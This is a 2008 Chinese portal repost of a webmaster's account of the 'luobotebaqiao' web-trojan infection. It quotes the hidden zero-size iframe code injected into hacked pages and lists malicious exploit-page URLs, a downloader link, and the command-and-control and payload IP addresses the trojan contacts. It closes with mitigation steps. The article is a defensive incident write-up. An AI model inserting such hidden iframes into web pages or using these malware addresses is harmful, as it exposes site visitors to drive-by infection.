欢迎你光临金州视窗网站!网址:www.c0859.com

商务领航   互联星空  我的e家  网上客服  服务督察  

首页 | 新闻 | | 股票 | 笑话 | 人才招聘 | 体育 | 教育 | 高考 | 奥运 | | 企业黄页 | 网络直播间
图片 | 健康 | IT技术 | 娱乐 | 汽车 | 电脑医院 | 旅游 | 电影 | 文学 | 游戏 | 国际足球 | 便民服务 | 电脑 播客
 天气查询  火车查询  在线杀毒   七彩铃音  网速测试 算命  短信息  ADSL宽带 118114服务
  首页 | 网络技术 | 病毒播报 | 图形设计 | 网站建设 | 服务器相关 | 电脑硬件 | 黑客技术 | 数据库技术 | 门户·搜索

 
你当前位置:金州视窗首页 > IT技术 > 网站建设
luobotebaqiao病毒防治临时解决方案

发布:2008-05-20   来自:网友或互联网   编辑:admin  查看:

 

  前段时间,自己服务器上中了病毒luobotebaqiao,这个挂马者也真是垃圾。地震期间,竟然把知名的公益网站也给挂马。其良心真是大大地坏啊。刚开始的挂马代码是:<iframe src=http://1.luobotebaqiao.info/index.htm width=0 height=0></iframe>,<iframe src=http://2.luobotebaqiao.info/index.htm width=0 height=0></iframe>JVC金州视窗!了解黔西南,从金州视窗开始!
     而现在的挂马代码是<iframe src=http://ddd.luobotebaqiao.org/ddddd.htm width=0 height=0></iframe>  看到一个论坛上说的是大名鼎鼎的赛迪网也给它袭击了。我在google搜索的时候,出现这个画面。JVC金州视窗!了解黔西南,从金州视窗开始!
JVC金州视窗!了解黔西南,从金州视窗开始!

中毒现象表现为:用最新的360安全卫士查杀不到,装360的防火墙也无济于事,其他的杀毒软件也都查不出来,但重启主机就暂时又不见了,过一段时间就可能又出现了,周六和周日表现比较频繁;JVC金州视窗!了解黔西南,从金州视窗开始!

  以下是我在网上搜集的资料:JVC金州视窗!了解黔西南,从金州视窗开始!

  http://ddd.luobotebaqiao.org/ddddd.htmJVC金州视窗!了解黔西南,从金州视窗开始!

  http://ddd.luobotebaqiao.org/14.htm MS06014JVC金州视窗!了解黔西南,从金州视窗开始!

  http://ddd.luobotebaqiao.org/rl.htm realoneJVC金州视窗!了解黔西南,从金州视窗开始!

  http://ddd.luobotebaqiao.org/new.htm realone11JVC金州视窗!了解黔西南,从金州视窗开始!

  http://ddd.luobotebaqiao.org/lz.htm 联众0DAYJVC金州视窗!了解黔西南,从金州视窗开始!

  http://ddd.luobotebaqiao.org/bf.htm 爆风JVC金州视窗!了解黔西南,从金州视窗开始!

  http://ddd.luobotebaqiao.org/xl.htm 没见到内容. 看名字应该是要挂迅雷的JVC金州视窗!了解黔西南,从金州视窗开始!

  刚刚下了下,以前的记录. 以上几个马. 均跟以前:1.luobotebaqiao.info 中的网马一样.JVC金州视窗!了解黔西南,从金州视窗开始!

  下载者:http://exe.luobotebaqiao.net/w3.exeJVC金州视窗!了解黔西南,从金州视窗开始!

  本人刚刚是准备脱壳,再看下这个东西,下的是什么. 结果,搞半天.也没搞出来.JVC金州视窗!了解黔西南,从金州视窗开始!

  壳脱了,也没看到. 本人又不会用OD 查看下载地址. 准备用嗅探. 嗅下子. 结果,没的工具.JVC金州视窗!了解黔西南,从金州视窗开始!

  所以. 就直接运行了它. 效果不错.JVC金州视窗!了解黔西南,从金州视窗开始!

  直接运行w3.exe 后. 首先会调用进程:svchost.exe 用户名: 当前管理员. 非SYSTEMJVC金州视窗!了解黔西南,从金州视窗开始!

  连接到:222.186.13.200 这个地址.JVC金州视窗!了解黔西南,从金州视窗开始!

  接着. 会连接到60.191.208.235 下载N 多木马. 木马后缀名:msi .JVC金州视窗!了解黔西南,从金州视窗开始!

  如果连接失败. 比如: 本人用IPSEC 将这个IP 封掉. 那么.过几分钟后.JVC金州视窗!了解黔西南,从金州视窗开始!

  会连到:60.191.215.126 将从这里,下载N 多木马. 后缀名:MSI.JVC金州视窗!了解黔西南,从金州视窗开始!

  这两个下载木马的IP 的关系. : 先调用60.191.208.235 这个服务器.JVC金州视窗!了解黔西南,从金州视窗开始!

  如果失败, 再调用60.191.215.126 如果,两个都失败了.则关闭连接. 任意一个成功后,JVC金州视窗!了解黔西南,从金州视窗开始!

  比如: 第一个成功下载下来木马, 完成后关闭连接. 不连第二个.JVC金州视窗!了解黔西南,从金州视窗开始!

  下载下来的木马,均以 msi 后缀来运行.JVC金州视窗!了解黔西南,从金州视窗开始!

  文件名: _qosec0.msi _qosec2.msi 这种类型!JVC金州视窗!了解黔西南,从金州视窗开始!

  从_qosec0.msi 一直到_qosec34.msi . 总共30几个木马.JVC金州视窗!了解黔西南,从金州视窗开始!

  木马所在地: C:\Documents and Settings\Administrator\Local Settings\TempJVC金州视窗!了解黔西南,从金州视窗开始!

  如果,你使用了本人的 软件策略, 那么, 你可以在这里看到. 30几个木马,外加几十个BAT批处理 文件.JVC金州视窗!了解黔西南,从金州视窗开始!

  用来删除木马文件的. 并且不会中毒.JVC金州视窗!了解黔西南,从金州视窗开始!

  解决方法:1:在css代码里屏蔽 iframe ,我以前写过文章地址:http://www.admin5.com/article/20071129/63757.shtml,你可以写一个网页把css代码写入,然后保存为html文件,在服务器的IIS文档启用文档页脚把刚才的那个页面附加上,这个页面给everyone读取权限。不过用此法的话,会把JS文件屏蔽掉。 JVC金州视窗!了解黔西南,从金州视窗开始!

 2:关闭服务器上无用的端口(建议保留80端口和远程桌面端口。如果有FTP的话可以打开21端口,根据情况定,不过建议还是临时关闭ftp端口),在服务器的防火墙上只开这三个端口。对于杀毒软件可以设置其能访问网络。JVC金州视窗!了解黔西南,从金州视窗开始!
JVC金州视窗!了解黔西南,从金州视窗开始!

JVC金州视窗!了解黔西南,从金州视窗开始!


上一篇:网站建设中应该注意的原则
下一篇:增加反向链接的7大法门12奇招

关于本站 | 广告业务| 合作伙伴 | 招聘信息 | 网站地图 | 免责声明 | 联系我们
金州视窗 黔西南神舟电脑学校旗下站 WWW.C0859.COM 版权所有 地址:贵州省兴义市遵义路一巷一号
站长:欧阳树 车清江  电话:13885938054  联系QQ:412890897 675799550 912080222
Copyright © 2008-2009 金州视窗 Inc. All Rights Reserved  备案中...